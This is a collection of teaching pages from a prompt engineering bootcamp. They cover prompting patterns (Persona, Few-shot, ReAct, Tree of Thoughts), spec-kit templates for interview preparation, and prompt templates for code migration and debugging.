- **Accomplishments:** Delivered 3 weeks early, NPS 6.5→8.2, team engagement 4.1/5.0
- **Skills:** Agile/Scrum Master, AWS Cloud Practitioner, stakeholder management

Best for: Client Value Creation or Great Place to Work priority exercises
#### Persona B — Tech Lead, Banking Automation
- **Experience:** 5 years, AI/ML specialist
- **Current Project:** Banking automation (1,500 datasets processed, 6x speed improvement)
- **Accomplishments:** 4 POC demos to Senior Managers, 1 advanced to $800K pitch
- **Skills:** Python, AI tools (Copilot, Windsurf), spec-driven development

Best for: AI Enablement or Client Value Creation exercises
#### Persona C — Associate Manager, Digital Strategy
- **Experience:** 6 years, MBA hire, manages 5 people
- **Current Project:** Organizational redesign ($12M savings, 85% adoption rate)
- **Accomplishments:** Client satisfaction 9.1/10, innovation award, board presentation
- **Skills:** Change management, AI workforce planning, thought leadership

Best for: Great Place to Work or Community exercises

Sample Job Descriptions
## Jobs for Interview Prep Exercises
#### Job A — Senior Manager, AI Strategy
- **Company:** Fortune 500 Financial Services
- **Role:** Develop enterprise AI strategy and lead client-facing transformations
- **Requirements:** 8+ years consulting, 3+ in AI/digital, $2M+ engagement leadership
- **Team:** 6 direct reports, 20+ indirect
#### Job B — Principal Consultant, Banking Technology
- **Company:** Big 4 Consulting Firm
- **Role:** Lead core banking modernization and cloud-native architecture projects
- **Requirements:** 7+ years banking technology, cloud expertise, CTO/CIO relationships
- **Team:** Lead 10–15 person engagement teams
#### Job C — Director, Digital Transformation
- **Company:** Fortune 100 Retail Company
- **Role:** Internal transformation leader for AI-enabled operations
- **Requirements:** 10+ years transformation experience, P&L responsibility, executive presence
- **Team:** Multiple cross-functional teams (50+ people)

Templates
## Spec-Kit Workflow Templates
### knowledge-base.md
```
# Interview Knowledge Base
## STAR Method Framework
- **Situation**: Context and background
- **Task**: What needed to be accomplished
- **Action**: Steps you took (focus on YOUR actions)
- **Result**: Outcome and impact (quantified when possible)
## Common Senior Manager Questions
1. "Tell me about a time you led a complex project"
2. "How do you handle competing stakeholder priorities?"
3. "Describe your approach to building teams"
4. "Give an example of driving strategic change"
5. "What's your experience with digital/AI transformation?"
## Positioning Strategy Options
- **Technical Expert**: Emphasize deep functional skills
- **Strategic Leader**: Focus on business impact and vision
- **Balanced Bridge**: Demonstrate both technical depth and business acumen
```
### specification.md
```
# Interview Specification
## Target Role Details
- **Position**: [Role title]
- **Company**: [Company name and industry]
- **Key Requirements**: [Must-have qualifications]
- **Team/Scope**: [Management responsibilities]
## Candidate Background
- **Current Role**: [Your position and experience]
- **Key Projects**: [2-3 most relevant projects]
- **Notable Achievements**: [Quantified results]
- **Skills Gap Analysis**: [What you're missing vs what you have]
## Success Criteria
- [What good positioning looks like for this role]
- [Key messages to convey]
- [Questions to ask that show strategic thinking]
```
### implementation-plan.md
```
# Interview Implementation Plan
## Phase 1: ReAct Analysis
**THINK**: What positioning strategy best fits this role + my background?
**ACT**: Map my experience to role requirements systematically
**OBSERVE**: What gaps/strengths emerge from this analysis?
**THINK**: How can I position gaps as learning opportunities?
**ACT**: Develop core narrative connecting past experience → role requirements
## Phase 2: Tree of Thoughts Strategy
**Option A**: [First positioning approach]
- Pros: [What works well]
- Cons: [Potential weaknesses]
- Risk Level: [High/Medium/Low]
**Option B**: [Second positioning approach]
- Pros: [What works well]
- Cons: [Potential weaknesses]
- Risk Level: [High/Medium/Low]
**Option C**: [Third positioning approach]
- Pros: [What works well]
- Cons: [Potential weaknesses]
- Risk Level: [High/Medium/Low]
**Selected Strategy**: [Chosen approach with rationale]
## Phase 3: Materials Generation
- One-page positioning summary
- 5 prepared STAR examples
- Strategic questions to ask
- Practice plan for delivery
```
Research
## Research References
- **White et al. (2023)** — "A Prompt Pattern Catalog to Enhance Prompt Engineering with ChatGPT" · arXiv 2302.11382
  Foundational patterns: Persona, Few-shot, Template, Chain-of-Thought
- **Yao et al. (2022)** — "ReAct: Synergizing Reasoning and Acting in Language Models" · arXiv 2210.03629
  Think → Act → Observe pattern for complex reasoning
- **Yao et al. (2023)** — "Tree of Thoughts: Deliberate Problem Solving with Large Language Models" · arXiv 2305.10601
  Generate → Evaluate → Choose pattern for decision making

Completion
## Workshop Completion Checklist
### Session 1 Objectives
- I can explain when to use ADRs vs Structured Files vs Tool-Assisted approaches
- I can identify Persona, Few-shot, Template, Chain-of-Thought patterns in prompts
- I generated realistic priorities using the Priority Builder methodology
- I understand the difference between systematic and ad-hoc prompting
### Session 2 Objectives
- I can execute ReAct analysis (Think → Act → Observe) for complex problems
- I can use Tree of Thoughts to evaluate multiple strategies
- I built complete interview preparation materials using the 4-file workflow
- I see how the same patterns scale across business and technical domains
### Action Items
- Apply ReAct pattern to one complex work decision this week
- Create a spec-kit workflow for a task I do repeatedly
- Evaluate new AI tools using the Tier Framework
- Share the Three Approaches framework with my team

Joey Lopez · 2026 · [jrlopez.dev ]()
---
# bootcamp-reference.md
# https://jrlopez.dev/p/bootcamp-reference.html
---
title: "Quick Reference Cards"
description: "6-card one-pager of all frameworks."
author: "Joey Lopez"
date: "2026-01-20"
tags: ["reference", "prompting", "template"]
atom_id: 11
source_html: "bootcamp-reference.html"
url: "https://jrlopez.dev/p/bootcamp-reference.html"
generated: true
---
# Quick Reference
One-page reference for all frameworks, patterns, and workflows from the Prompt Engineering Bootcamp
Joey Lopez · Prompt Engineering Bootcamp

Card 1
## Three Approaches Decision Matrix
| When your task is... | Choose this approach | Example |
|---|---|---|
| Simple–Medium complexity | **ADRs + Config** | .github/copilot-instructions.md |
| Team uses multiple AI tools | **ADRs + Config** | Reference standards document |
| Complex, repeated tasks | **Structured Files** | Priority Builder (325 lines) |
| Learning prompt engineering | **Structured Files** | 4-file interview workflow |
| Team committed to one IDE | **Tool-Assisted** | Windsurf workflows |
| Want automated guidance | **Tool-Assisted** | Platform-integrated prompts |
**Decision Rule:** Use the simplest approach that handles your complexity level.

Card 2
## Foundational Patterns Checklist
Before writing any prompt, check for all four patterns:
- **Persona** — "You are an expert [role] with [specific expertise]..."
- **Few-shot** — Provide 2–3 example input/output pairs
- **Template** — "Respond in this format: [structure]"
- **Chain-of-Thought** — "Show your reasoning step by step"

**Quality check:** Does your prompt use all 4 patterns? If not, which one would help most?

Card 3
## Advanced Patterns Quick Guide
### ReAct Pattern — multi-step tasks
```
THINK: Analyze the situation — what is actually needed?
ACT: Take a specific, concrete action
OBSERVE: Check results — did it work? What changed?
THINK: Next steps based on what you observed
(repeat until complete)
```
### Tree of Thoughts — decision points
```
1. Generate 3 genuinely different approaches
2. Evaluate pros/cons/risks of each
3. Choose best approach with explicit rationale
```
### Spec-Kit Workflow — complex tasks
```
knowledge-base.md Domain expertise (reusable across tasks)
specification.md This task's specific requirements
implementation-plan.md Execution strategy (ReAct + Tree of Thoughts)
execution.md Generated output materials
```
Card 4
## Pattern Recognition Quick Test
When you see any prompt, identify:
- What **persona** is established?
- What **examples** are provided?
- What **format** is requested?
- Is **reasoning** required?
#### Good prompt = all 4 patterns visible
If you can't find one of the four, the prompt has a gap. Fill it before you run it.

Card 5
## Taking This Forward
### This Week
- Apply ReAct pattern to one complex work decision
- Use Tree of Thoughts for your next strategic choice
- Create a spec-kit workflow for a task you do repeatedly
### Longer Term
- Evaluate new AI tools using the Three Approaches framework
- Build team templates using foundational patterns
- Scale systematic thinking across your domain

**The Core Principle:** Patterns beat formats. Choose your approach based on team context and task complexity.

Card 6
## Research Backing
- **White et al. (2023)** — Prompt Pattern Catalog · arXiv 2302.11382
  Foundational patterns: Persona, Few-shot, Template, Chain-of-Thought
- **Yao et al. (2022)** — ReAct Pattern · arXiv 2210.03629
  Think → Act → Observe for complex reasoning
- **Yao et al. (2023)** — Tree of Thoughts · arXiv 2305.10601
  Generate → Evaluate → Choose for decision making

Joey Lopez · 2026 · [jrlopez.dev ]()
---
# bootcamp-session1.md
# https://jrlopez.dev/p/bootcamp-session1.html
---
title: "Session 1 — Patterns"
description: "Three Approaches, foundational patterns, priority builder."
author: "Joey Lopez"
date: "2026-01-15"
tags: ["prompting", "teaching"]
atom_id: 9
source_html: "bootcamp-session1.html"
url: "https://jrlopez.dev/p/bootcamp-session1.html"
generated: true
---
# Session 1
Industry Standards & Real-World Application — from ad-hoc prompting to systematic approaches
Joey Lopez · Prompt Engineering Bootcamp · 60 minutes

Overview
## Session Agenda
| Time | Activity | Type |
|---|---|---|
| 0–5 min | Problem & Solution Overview | Lecture |
| 5–15 min | Three Approaches Framework | Lecture |
| 15–20 min | Foundational Patterns | Lecture |
| 20–25 min | Demo: Priority Builder | Hands-on |
| 25–45 min | Your Turn: Build Priorities | Hands-on |
| 45–55 min | Compare: Three Approaches | Hands-on |
| 55–60 min | Wrap & Session 2 Preview | Lecture |
The Problem
## Ad-Hoc AI Prompting Doesn't Scale
Most professionals use AI tools the same way they'd use a search engine — one-off questions, generic context, inconsistent results. Here's what that looks like:
```
Professional: "Hey AI, help me write my annual priorities"
AI: [generates generic priorities]
Professional: "These don't capture my impact... try again"
AI: [generates different generic priorities]
Professional: "Still missing key metrics..."
```
The problems with ad-hoc prompting:
- Every prompt starts from scratch — no accumulated knowledge
- No team knowledge captured — can't share what works
- Inconsistent results across attempts and team members
- Successful approaches can't be reused or improved

**Key insight:** Patterns matter more than format. Choose based on team needs, not dogma.

Framework
## Three Valid Approaches
There is no single "right" way to do systematic prompting. Three approaches have emerged in industry practice, each suited to different team contexts:
#### ADRs + Config
Architecture Decision Records plus configuration files. Example: a .github/copilot-instructions.md that any AI tool reads automatically. Best for most teams. Low setup overhead.
#### Structured Files
Multi-file workflows: knowledge-base → specification → implementation-plan. Each file has a specific purpose and builds on the previous. Best for complex, repeated tasks and learning.
#### Tool-Assisted
Platform-native workflows like Windsurf's cascade system (290 lines). The tool manages context and sequencing automatically. Best for teams committed to one IDE or platform.
### Tier Framework for Evaluation
Use this to assess any prompt engineering approach you encounter:
#### Tier 1 — Proven (10+ years)
Architecture Decision Records, Few-shot prompting, Chain-of-Thought. Used at scale by Microsoft, AWS, Google, Netflix. These patterns have survived real production use.
#### Tier 2 — Production Ready (1–3 years)
.github/copilot-instructions.md, ReAct pattern. Growing enterprise adoption. Reasonably safe to build on.
#### Tier 3 — Experimental (<2 years)
Spec-kit workflows, structured prompt files, tool-specific approaches. Interesting and useful, but unproven at scale. Use deliberately.

Patterns
## Four Foundational Patterns
These patterns are research-backed and appear in all serious prompt engineering work. A well-constructed prompt uses all four.
- **Persona** — "You are an expert [role] with [specific expertise]..." Establishes the lens the AI uses for all responses.
- **Few-shot** — Provide 2–3 example input/output pairs before your actual request. Shows the desired format and quality level.
- **Template** — "Respond in this format: [structure]" Constrains output shape for reuse and consistency.
- **Chain-of-Thought** — "Show your reasoning step by step before giving the answer." Forces deliberate reasoning, catches errors earlier.
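One way to internalize the four patterns is to see them assembled mechanically. This is an illustrative sketch only — the `build_prompt` helper and its wording are hypothetical, not part of the Priority Builder:

```python
# Hypothetical sketch: composing the four foundational patterns
# (Persona, Few-shot, Template, Chain-of-Thought) into one prompt string.

def build_prompt(role: str, examples: list[tuple[str, str]], fmt: str, task: str) -> str:
    persona = f"You are an expert {role}."                                   # Persona
    few_shot = "\n".join(f"Example input: {i}\nExample output: {o}"          # Few-shot
                         for i, o in examples)
    template = f"Respond in this format: {fmt}"                              # Template
    cot = "Show your reasoning step by step before giving the answer."      # Chain-of-Thought
    return "\n\n".join([persona, few_shot, template, cot, f"Task: {task}"])

prompt = build_prompt(
    role="career coach specializing in professional priorities",
    examples=[("raw accomplishment notes", "one priority with an ABCD reflection")],
    fmt="CSV row: category, priority, metric",
    task="Draft one priority for a delivery lead.",
)
print(prompt)
```

The point is not the helper itself but the checklist it enforces: if one of the four sections is empty, the prompt has a gap.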
### The 325-Line Priority Builder
The Priority Builder Agent prompt uses all four patterns together. It demonstrates what a production-grade prompt looks like vs a quick one-off request:
- **Persona:** "You are an expert career coach specializing in professional priorities..."
- **Few-shot:** Built-in priority examples with ABCD reflections showing expected quality
- **Template:** Structured CSV output plus formatted summaries for direct submission
- **Chain-of-Thought:** The 20-question ABCD reflection framework that guides analysis

The result: persona-driven specificity, structured questioning that ensures completeness, and consistent output format — versus the ad-hoc alternative that generates something generic every time.

Exercises
## Hands-On: Build Priorities
### Exercise 1 — Freestyle First (10 minutes)
Before using any systematic approach, attempt to create one priority for a demo persona using your normal prompting style.
#### Choose a demo persona
- **Option A:** Delivery Lead, Financial Services (8 years, team management)
- **Option B:** Tech Lead, Banking Automation (5 years, AI/ML specialist)
- **Option C:** Associate Manager, Digital Strategy (6 years, transformation)

**Goal:** 1 priority in any category with basic reflection. Use your AI tool however you normally would. Notice what's hard: specificity, metrics, avoiding generic language that could apply to anyone.
### Exercise 2 — Priority Builder Template (15 minutes)
Now use the complete Priority Builder Agent with a different persona than Exercise 1.
- Load the 325-line Priority Builder prompt into your AI tool
- Choose a different persona than the freestyle round
- Let the agent guide you through its 20-question process — answer as your persona
- Select a version: Conservative, Balanced, or Aspirational
- Export the CSV output (ready for submission format)

**Success criteria:** Complete ABCD reflections with specific metrics, CSV output ready.
### Exercise 3 — Compare Three Approaches (10 minutes)
Same Spring Boot 2→3 migration task, three different approaches. Observe the difference in structure and maintenance overhead — not the result.
#### Approach A — ADRs + Config
```
"Following .github/copilot-instructions.md,
migrate UserController to Spring Boot 3"
```
#### Approach B — Structured Files
Load: knowledge-base.md → specification.md → implementation-plan.md
#### Approach C — Tool-Assisted
Windsurf cascade workflow (290-line systematic methodology with built-in validation steps).

Same result, different maintenance overhead. Which fits your team?

Wrap-Up
## What You Accomplished
- Learned the Three Approaches evaluation framework and when each applies
- Recognized all four foundational patterns in a real 325-line production prompt
- Generated priorities using a systematic approach vs freestyle
- Compared structured vs unstructured methodology on the same task
### Cross-Domain Application
The patterns you practiced in this session work across domains:
#### Business Applications
- Strategic planning documents
- Performance reviews and goal setting
- Client presentations and proposals
- Training material development
#### Technical Applications
- Code migration and refactoring
- Architecture documentation
- Troubleshooting workflows
- System design patterns

Same systematic thinking, different domain. Session 2 demonstrates this across the full range.
#### Session 2 Preview
- **ReAct pattern** (Think → Act → Observe) for multi-step reasoning
- **Tree of Thoughts** for decision points with real tradeoffs
- **Interview prep workflow** — 4-file systematic approach
- **Live technical demo** — Spring Boot migration using same patterns

Bring a job description you're interested in, or use the samples in the participant materials.

Joey Lopez · 2026 · [jrlopez.dev ]()
---
# bootcamp-session2.md
# https://jrlopez.dev/p/bootcamp-session2.html
---
title: "Session 2 — Advanced"
description: "ReAct, Tree of Thoughts, spec-kit, interview prep."
author: "Joey Lopez"
date: "2026-01-22"
tags: ["prompting", "teaching"]
atom_id: 10
source_html: "bootcamp-session2.html"
url: "https://jrlopez.dev/p/bootcamp-session2.html"
generated: true
---
# Session 2
Advanced Patterns & Complete Workflows — from simple templates to orchestrated systems
Joey Lopez · Prompt Engineering Bootcamp · 60 minutes

Overview
## Session Agenda
| Time | Activity | Type |
|---|---|---|
| 0–5 min | Session 1 Recap + Advanced Patterns Overview | Lecture |
| 5–10 min | Spec-Kit Methodology | Lecture |
| 10–15 min | ReAct + Tree of Thoughts | Lecture |
| 15–25 min | Demo: Interview Prep Workflow | Hands-on |
| 25–40 min | Your Turn: Build Interview Materials | Hands-on |
| 40–55 min | Live Java Demo: Spring Migration | Hands-on |
| 55–60 min | Integration + Next Steps | Lecture |
Foundation
## Session 1 Recap
In Session 1 you built the foundation:
- **Three Approaches Framework** — ADRs vs Structured Files vs Tool-assisted
- **Tier Evaluation** — proven vs emerging vs experimental
- **Four Foundational Patterns** — Persona, Few-shot, Template, Chain-of-Thought
- **Real application** — Priority Builder with actual deliverables and CSV output

Session 2 evolves each of those: simple patterns become orchestrated workflows, single-step tasks become multi-phase reasoning, and the same methodology scales from priorities to interviews to code.

Patterns
## Advanced Patterns
When a single prompt with four foundational patterns isn't enough for complex, multi-step tasks, two research-backed patterns handle the gap:
### ReAct Pattern
From Yao et al. (2022). Designed for tasks that require validation checkpoints between steps — where you can't know the next action until you observe the result of the current one.
THINK: Analyze the situation — what's actually being asked?
↓
ACT: Take a specific, concrete action
↓
OBSERVE: Check results — did it work? What changed?
↓
THINK: Next steps based on what you observed
↓
Repeat until task complete

**When to use:** Multi-step tasks where each step depends on the previous result. Code migration, gap analysis, systematic positioning strategy.
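The control flow can be sketched in code — a hypothetical `react_loop` helper, since in the workshop the pattern lives inside prompts, not scripts. The defining property is that each THINK consumes the previous OBSERVE:

```python
# Illustrative ReAct control flow; helper and step contents are hypothetical.

def react_loop(steps):
    """steps: (think_fn, action_description, act_fn) triples."""
    trace, observation = [], None
    for think, act_desc, act in steps:
        trace.append(("THINK", think(observation)))  # reason over last observation
        trace.append(("ACT", act_desc))              # commit to one concrete action
        observation = act()                          # execute it
        trace.append(("OBSERVE", observation))       # record what changed
    return trace

# Toy two-step migration: step 2's THINK depends on step 1's OBSERVE
trace = react_loop([
    (lambda obs: "Dependencies must be updated before annotations",
     "Update javax → jakarta imports", lambda: "compile OK"),
    (lambda obs: f"Compile result was '{obs}', so modernize security config",
     "Migrate to SecurityFilterChain", lambda: "tests pass"),
])
for phase, detail in trace:
    print(f"{phase}: {detail}")
```

If a step's THINK ignores the prior observation, you are no longer doing ReAct — just a fixed checklist.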
### Tree of Thoughts
From Yao et al. (2023). Designed for decision points where multiple valid approaches exist and the right choice requires explicit evaluation of tradeoffs.
```
1. Generate 3 genuinely different approaches to the problem
2. Evaluate pros/cons/risks of each approach explicitly
3. Choose the best approach with clear rationale
4. Proceed with that choice
```
**When to use:** Any decision point with real tradeoffs. Interview positioning strategy, architecture choices, migration approach selection.
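The generate → evaluate → choose loop can be made concrete with a toy scorer. The options and scores below are hypothetical, echoing the interview-strategy example later in this session:

```python
# Hypothetical Tree of Thoughts sketch: score tradeoffs explicitly,
# then choose with a recorded rationale. Numbers are illustrative.

options = [  # risk: 1 = low .. 3 = high
    {"name": "Technical Expert", "pros": 2, "cons": 2, "risk": 2},
    {"name": "Strategic Leader", "pros": 2, "cons": 2, "risk": 2},
    {"name": "Balanced Bridge",  "pros": 3, "cons": 1, "risk": 1},
]

def evaluate(option):
    # Simple tradeoff score: reward pros, penalize cons and risk
    return option["pros"] - option["cons"] - option["risk"]

chosen = max(options, key=evaluate)
rationale = (f"Selected {chosen['name']}: best pros/cons/risk balance "
             f"(score {evaluate(chosen)})")
print(rationale)
```

The value is the forced step of writing down three genuinely different options and a rationale — the scoring function is just scaffolding for that discipline.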
### When Simple Patterns Are Enough
#### Use Foundational Patterns (Session 1)
- Single-step tasks
- Well-understood domains
- Template-driven outputs
- Quick iterations needed
#### Use Advanced Patterns (Session 2)
- Multi-step reasoning required
- Decision points with tradeoffs
- Complex domain knowledge
- Audit trail needed
- Team scalability important

**Decision rule:** Use the simplest approach that handles the complexity. Don't reach for ReAct when a good Persona + Template covers it.

Methodology
## Spec-Kit 4-File Workflow
The spec-kit pattern separates concerns across files so each piece can be reused, updated independently, and understood by teammates without context from your head.
- **File 1 — knowledge-base.md:** Domain expertise. Reusable across tasks. STAR method, positioning options, evaluation criteria.
- **File 2 — specification.md:** This task's specific requirements. Role details, candidate background, gaps and strengths.
- **File 3 — implementation-plan.md:** Execution strategy using ReAct + Tree of Thoughts. Reasoning documented.
- **File 4 — execution.md:** Generated materials — positioning statement, STAR examples, talking points.

**Key advantage:** Separation of concerns. knowledge-base.md stays reusable; specification.md is the only file that changes per task; execution.md is throwaway.

Exercises
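The dependency order can be pictured as a loader that concatenates the first three files into a single context — execution.md is output, not input. This is a hypothetical sketch (the workshop does this by loading files into an AI tool, not via a script), demoed with throwaway files:

```python
# Hypothetical spec-kit context assembler. File names follow the workflow;
# the file contents here are stand-ins.
import tempfile
from pathlib import Path

ORDER = ["knowledge-base.md", "specification.md", "implementation-plan.md"]

def assemble_context(folder: Path) -> str:
    """Concatenate the spec files in dependency order."""
    parts = []
    for name in ORDER:
        text = (folder / name).read_text()
        parts.append(f"<!-- {name} -->\n{text}")
    return "\n\n".join(parts)

# Demo with throwaway files in a temp directory
with tempfile.TemporaryDirectory() as d:
    folder = Path(d)
    (folder / "knowledge-base.md").write_text("# STAR method, positioning options...")
    (folder / "specification.md").write_text("# Target role, candidate background...")
    (folder / "implementation-plan.md").write_text("# ReAct + Tree of Thoughts plan...")
    context = assemble_context(folder)

print(context)
```

Note that only specification.md changes per task, so re-running the loader for a new task touches exactly one input file.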
## Exercise: Build Interview Strategy
### Phase 1 — Create specification.md (8 minutes)
- Start with the provided knowledge-base.md (interview fundamentals, STAR method, positioning options)
- Select a job from the participant materials (Senior Manager AI Strategy, Principal Consultant Banking, Director Digital Transformation)
- Pick the same demo persona you used in Session 1 for continuity
- Document: target role details, your persona's background, key gaps and key strengths
### Phase 2 — Execute implementation-plan.md (7 minutes)
#### ReAct Analysis
```
THINK: What is the biggest gap between my background and this role?
ACT: Map my specific experience to each key requirement
OBSERVE: What positioning angle emerges from this mapping?
THINK: How do I turn gaps into learning narratives?
ACT: Develop core connecting story: past experience → role requirements
```
#### Tree of Thoughts Strategy
```
Option A: Technical Expert
Pros: Deep credibility, clear differentiation
Cons: May undersell business acumen, narrow appeal
Risk: Medium
Option B: Strategic Leader
Pros: Broad appeal, executive positioning
Cons: May lack specificity, needs strong evidence
Risk: Medium
Option C: Balanced Bridge
Pros: Technical depth + business growth story
Cons: Harder to articulate concisely
Risk: Low
Selected: [Your choice with rationale]
```
**Success criteria:** Clear positioning strategy with documented rationale, not just a chosen answer.

Technical Demo
## Live Java Demo: Spring Boot Migration
Same patterns, technical domain. Spring Boot 2→3 migration involves three types of changes: namespace updates (javax → jakarta), annotation modernization, and security configuration updates. The three approaches from Session 1 apply directly:
#### Approach A — ADRs + Config
A .github/copilot-instructions.md that documents migration standards. A single prompt referencing that document handles most cases.
```
"Following .github/copilot-instructions.md migration standards,
migrate UserController to Spring Boot 3"
```
#### Approach B — Structured Files (with ReAct)
A spec/ folder workflow. ReAct pattern in the implementation plan:
```
THINK: Dependencies must be updated before annotations
ACT: Update javax → jakarta imports first
OBSERVE: mvn compile — success, proceed to annotations
THINK: Security config needs modernization next
ACT: Migrate to SecurityFilterChain pattern
```
#### Approach C — Tool-Assisted (Windsurf)
290-line cascade workflow. Built-in validation gates at each step. Tree of Thoughts for the security config decision:
- Option A: Keep current security config (low risk, technical debt remains)
- Option B: Modernize to SecurityFilterChain (balanced)
- Option C: Full OAuth2 rewrite (high risk, high reward)
- **Decision:** Option B — balanced modernization
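The mechanical first ReAct step (javax → jakarta) can be sketched as a small rewrite script. Illustrative only: real migrations typically use dedicated tooling such as OpenRewrite, and this regex covers just a subset of the renamed namespaces:

```python
# Simplified stand-in for the javax → jakarta import rewrite.
import re

# Subset of javax.* packages that were renamed to jakarta.* in Jakarta EE 9
RENAMED = ("persistence", "servlet", "validation", "annotation")

def migrate_imports(java_source: str) -> str:
    """Rewrite only the renamed namespaces; other javax.* imports are untouched."""
    pattern = re.compile(r"\bimport\s+javax\.(" + "|".join(RENAMED) + r")\b")
    return pattern.sub(lambda m: f"import jakarta.{m.group(1)}", java_source)

before = "import javax.persistence.Entity;\nimport javax.sql.DataSource;"
after = migrate_imports(before)
print(after)  # javax.sql is part of Java SE, not Jakarta EE, so it stays as-is
```

The OBSERVE step in the workflow — running `mvn compile` after the rewrite — is exactly what catches the namespaces a blunt rewrite would miss.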
### Cross-Domain Pattern Recognition
The same cognitive patterns appear across all three domains in this workshop:
#### Universal pattern: ReAct
- **Priorities:** Think what category fits → Act on metrics → Observe quality → Refine
- **Interview:** Think about gap → Act on positioning → Observe fit → Select strategy
- **Code:** Think dependencies → Act on imports → Observe compilation → Continue

The domain changes. The systematic thinking doesn't.

Toolkit
## What You Now Have
#### Evaluation Framework
- Three Approaches — ADRs vs Structured vs Tool-assisted
- Tier Assessment — proven vs emerging vs experimental
#### Pattern Library
- **Foundational:** Persona, Few-shot, Template, Chain-of-Thought
- **Advanced:** ReAct, Tree of Thoughts, Spec-Kit
### This Week
- Apply ReAct pattern to one complex work decision
- Use Tree of Thoughts for your next strategic choice — write out the three options explicitly
- Create a spec-kit workflow for one task you do repeatedly
### Longer Term
- Evaluate new AI tools using the Three Approaches and Tier frameworks before adopting
- Build team templates using proven foundational patterns — document what works
- Apply systematic thinking across your domain — same patterns, different problems
#### Research Papers
- White et al. (2023) — Prompt Pattern Catalog · arXiv 2302.11382
- Yao et al. (2022) — ReAct Pattern · arXiv 2210.03629
- Yao et al. (2023) — Tree of Thoughts · arXiv 2305.10601

Joey Lopez · 2026 · [jrlopez.dev ]()
---
# bootcamp-skills.md
# https://jrlopez.dev/p/bootcamp-skills.html
---
title: "Make Skills (Capstone)"
description: "Build your own skill from any repeated task."
author: "Joey Lopez"
date: "2026-03-20"
tags: ["methodology", "teaching", "template"]
atom_id: 21
source_html: "bootcamp-skills.html"
url: "https://jrlopez.dev/p/bootcamp-skills.html"
generated: true
---
# Bootcamp Skills Reference
Five role-specific AI workflow guides. Pick your track, run the interrogation, get structured output.
Joey Lopez · Sr. Data Engineer

skill spec
---
name: dev-second-brain
version: 1.0
description: Interrogation-driven code assistance — migrations, refactoring, features, debugging
patterns: [ReAct, spec-kit, structured-output]
---
## Developer Second Brain
Gathers rich context about your codebase before suggesting changes. Uses ReAct (THINK→ACT→OBSERVE) to produce plans, diffs, and tests — not loose prose. Context is everything. Structure gets rewarded. You are the retrieval system.

When to use each scenario
#### A — Code Migration
"I need to migrate from Framework A to B"
Migration plan, code diffs, test strategy, rollback plan.
#### B — Refactoring
"I need to refactor this component"
Refactoring goals, dependency map, extraction plan, test approach.
#### C — Feature Implementation
"Build a new feature following our patterns"
Feature spec, code stubs with TODOs, test outline, integration points.
#### D — Systematic Debugging
"Track down root cause of production issue"
Hypothesis, investigation steps, diagnostic queries, solution options.

## Interrogation Framework — 15 questions · 4 phases
#### Phase 1 — Current State (Q1–5)
- **Language & Framework** — What language/framework + version? (e.g., Python 3.11 + Django 4.2)
- **Architecture Pattern** — Monolith, microservices, event-driven, layered?
- **Current Problem** — What specifically needs to change? (one sentence)
- **Scope** — One file, one module, or multiple services?
- **Team Size** — How many developers? What is your role?
#### Phase 2 — Target State (Q6–8)
- **Success Criteria** — How will you know it is working? Metrics, tests, deployment success?
- **Constraints** — No downtime, budget limits, timeline?
- **Dependencies** — What other systems does this touch?
#### Phase 3 — Implementation Context (Q9–12)
- **Test Coverage** — Existing tests? Unit, integration, e2e?
- **Team Conventions** — Naming convention, error handling pattern, logging standard?
- **Review Process** — Automated checks, approval gates?
- **Rollback Plan** — Safety net if something goes wrong?
#### Phase 4 — Knowledge (Q13–15)
- **Similar Changes** — Have you done something like this before?
- **Tribal Knowledge** — What does every developer wish they knew about this codebase?
- **Decision Log** — Are there decisions that limit how you can change this?

Starter Prompt Templates
#### Prompt Template — Scenario A (Migration)
```
You are a Developer Second Brain using the ReAct pattern (THINK→ACT→OBSERVE).
I need to migrate [OLD FRAMEWORK/VERSION] to [NEW FRAMEWORK/VERSION].
Before generating any plan, ask me the following questions one phase at a time:
Phase 1: Language/framework, architecture, scope, team size, current pain point
Phase 2: Success criteria, constraints, dependencies
Phase 3: Test coverage, team conventions, rollback plan
Phase 4: Prior similar changes, tribal knowledge, decision constraints
After I answer all phases, produce:
1. Implementation plan with THINK/ACT/OBSERVE annotations
2. Code diffs (before/after) for the critical path
3. Test strategy matrix (component | test type | approach | coverage)
4. Pre-deployment checklist
```
#### Prompt Template — Scenario C (Feature Implementation)
```
You are a Developer Second Brain.
I need to implement [FEATURE NAME] following our existing team conventions.
Interrogate me through 4 phases before generating anything:
Phase 1: Language/framework, architecture pattern, current module structure, scope
Phase 2: Success criteria, constraints, dependencies
Phase 3: Test pattern, naming conventions, error handling style, code review process
Phase 4: Tribal knowledge, any architectural constraints
Then produce:
- Code stubs with clear TODO annotations (following our exact conventions)
- Test file skeleton (matching our test pattern)
- Integration checklist
- Pre-merge checklist
```
#### Prompt Template — Scenario D (Debugging)
```
You are a Developer Second Brain using systematic debugging (ReAct).
I have a production issue: [DESCRIBE SYMPTOM]
Before generating hypotheses, ask me:
1. What is the exact error or unexpected behavior?
2. When did it start? After what change?
3. What have you already tried?
4. What do the logs show?
5. Which components or services are involved?
Then generate:
THINK: Top 3 hypotheses ranked by probability
ACT: Investigation steps for each hypothesis (specific commands/queries)
OBSERVE: What to look for — how to confirm or rule out each hypothesis
```
### Output Templates (ReAct plan · test matrix · checklist)

#### Implementation Plan (ReAct Format)

````
## Migration Plan: [Component] from [Old] to [New]
### Phase 1: Preparation
**THINK**: What needs to be true before we start?
- [ ] Dependencies installed
- [ ] Tests passing
- [ ] Backup created
**ACT**: Run these commands:
```bash
# setup steps
```
**OBSERVE**: Verify with:
```bash
# verification commands
```
### Phase 2: Core Change
**THINK**: What is changing and why?
- Breaking change X affects Y consumers
- New API requires Z configuration
**ACT**: Apply these changes:
```diff
- old_code()
+ new_code()
```
**OBSERVE**: Test coverage:
- [ ] Unit test for new_code()
- [ ] Integration test for X→Y flow
- [ ] No regression in unchanged code
### Phase 3: Verification
**THINK**: How do we know this is safe?
**ACT**: Run full test suite
**OBSERVE**: Success criteria met
````
#### Test Strategy Matrix
```
| Component | Test Type | Approach | Coverage |
|--------------|-------------|---------------------------------|---------------------------|
| [Component] | Unit | Mock async response | Function returns correctly |
| [Service] | Integration | Real async client | Full workflow with I/O |
| [API Handler]| E2E | Load test | 100 concurrent requests |
| [Rollback] | Regression | Before/after comparison | No breaking changes |
```
#### Pre-Deployment Checklist
```
## Pre-Deployment Checklist
### Code Quality
- [ ] Tests pass (unit + integration + e2e)
- [ ] Code review approved
- [ ] No new warnings in linter/type checker
- [ ] No security issues in dependency scan
- [ ] Documentation updated
### Performance & Stability
- [ ] Load test shows no degradation
- [ ] Error handling covers edge cases
